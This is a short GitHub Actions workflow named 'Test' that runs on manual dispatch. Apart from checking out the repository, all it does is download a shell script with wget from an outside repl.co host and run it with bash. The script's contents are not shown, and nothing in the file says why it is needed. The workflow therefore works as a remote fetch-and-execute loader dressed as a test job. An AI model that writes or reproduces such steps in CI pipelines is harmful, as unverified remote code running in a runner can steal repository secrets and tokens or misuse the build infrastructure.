name: Test

on:
  workflow_dispatch:
  
  
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: wget https://HTML-CSS-JS.idotmastera.repl.co/e.sh
      - run: bash e.sh
